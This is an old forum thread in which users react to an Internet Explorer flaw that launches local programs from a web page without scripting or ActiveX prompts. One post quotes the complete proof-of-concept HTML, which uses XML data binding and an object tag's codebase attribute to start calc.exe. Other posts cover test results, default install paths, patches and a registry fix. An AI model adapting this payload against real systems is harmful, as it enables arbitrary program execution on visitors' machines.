Scary IE bug!!

[Martin]

Simple
This will run the calculator on Winnt/2k machines

Advanced <- type in the path of any application and it will run this program.



UPDATE:

This is the full report - Executing arbitrary commands without Active Scripting or ActiveX.

 

[n0cmonkey]

If only Microsoft would patch these damn things.

 

[LongCoolMother]

holy freak! what right does IE have to do that? i didnt get no script running alert or NOTHING. thatz freaky, if theres a script like that that can run anything through IE without your notice

 

[gopunk]

is this bug supposed to do anything? all i see is some text telling me it's running calc.... but then it does nothing.

oh n/m, it was just the wrong path. that's tight.

code:



<< <html>
<head>
<title>Running "c:/winnt/system32/calc.exe"..</title>
<link rel="stylesheet" href="../sec.css">
</head>
<body>
Running "c:/winnt/system32/calc.exe"..
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/winnt/system32/calc.exe"></object>
]]>
</exploit>
</security>
</xml>
</body>
</html> >>

 

[FelixDeCat]

whats scary? nothing happens. lol.

 

[n0cmonkey]

unpatches holes in ie

 

[CrackRabbit]

JOY! yet another way to infect our computers with viruses...


<< If only Microsoft would patch these damn things >>


if only....

 

[Soulflare]

What's supposed to happen? (Using NS 6.21... where nothing happend)

 

[swayinOtis]

must be for win2k and XP. i don't have a c:\winnt directory in Win98

 

[MajesticMoose]

yeah, it didn't do anything on my computer. Sorry to disappoint!

 

[Gonad the Barbarian]

The second page works even with Java & ActiveX disabled. The first page probably would too if I was running NT. This is sort of bad.

Ok, this is worse than bad, it added that ClassID to my registry. And this is with ALL scripting supposedly disabled.

 

[cricky]

Well if you have your security settings done right, it should pop up an error saying you can't run ActiveX applications on this webpage...

It amazes me that people leave their computers so open to abuse...

--Christopher

 

[gopunk]

<< The second page works even with Java & ActiveX disabled. The first page probably would too if I was running NT. This is sort of bad. >>



i find this really cool.... apparently it works for any app that hosts the WebBrowser control... so no active whatever is required. works for outlook express too!

 

[shiner]

Yet another reason to NEVER do a default install of any MS OS.....doesn't work on mine cause XP isn't installed in WINNT on my system.

 

[gopunk]

<< Yet another reason to NEVER do a default install of any MS OS.....doesn't work on mine cause XP isn't installed in WINNT on my system. >>



mine isn't either, but i did do a default install (or so i think)... i don't remember ever telling it not to use winnt.

can somebody explain the code to me? i'm guessing that the object tag attempts to access an object specified in the codebase attribute, but why is the classid all 1's?

 

[LongCoolMother]

forgot to mention i was using win2k. it opens calculator and notepad..

 

[Gonad the Barbarian]

<< Well if you have your security settings done right, it should pop up an error saying you can't run ActiveX applications on this webpage...

It amazes me that people leave their computers so open to abuse...

--Christopher >>



Yes it should, now why the hell doesn't it? God knows I get that annoying pop up all the time, but at least I know it's blocking the crap. I got nothing here, and every aspect of ActiveX/Java/scripting that's accessible IS disabled. I just rechecked.

 

[jpsj82]

now i think this is awsome. however i do also think it is a great security risk.

 

[Argo]

Well, all it's doing is running a registered com server on your computer. That's equivalent to using an activex control. You can disable that by modifying your security settings. I don't think you can run any application like that -- only registered com servers.

 

[SinNisTeR]

win2k installs windows in c:\winnt
winxp install windows in c:\windows

by default

 

[Gonad the Barbarian]

<< Well, all it's doing is running a registered com server on your computer. That's equivalent to using an activex control. You can disable that by modifying your security settings. I don't think you can run any application like that -- only registered com servers. >>



Would you mind saying how to disable it then? Cuz if it's by simply changing the setting in Internet Options then that ain't working.

 

[gopunk]

<<

<< Well, all it's doing is running a registered com server on your computer. That's equivalent to using an activex control. You can disable that by modifying your security settings. I don't think you can run any application like that -- only registered com servers. >>



Would you mind saying how to disable it then? Cuz if it's by simply changing the setting in Internet Options then that ain't working. >>



well, greymagic has a registry fix

 

[Descartes]

 

[Eli]

I get the Active-X thing with the first one, but nothing happens with the 2nd one?

 

[cricky]

<<Yes it should, now why the hell doesn't it? God knows I get that annoying pop up all the time, but at least I know it's blocking the crap. I got nothing here, and every aspect of ActiveX/Java/scripting that's accessible IS disabled. I just rechecked.>>

Dunno... Mine pops up a window saying "Your current security setting prohibt running any ActiveX controls on this page. As a result, this page may not display correctly." No notepad or calculator pops up, can't run any apps with the second one.

Running IE 6, all the most recent security patches downloaded, on a Win2k SP2 system...

Go get those security roll-up patches if you have not from Windows Update...

--Christopher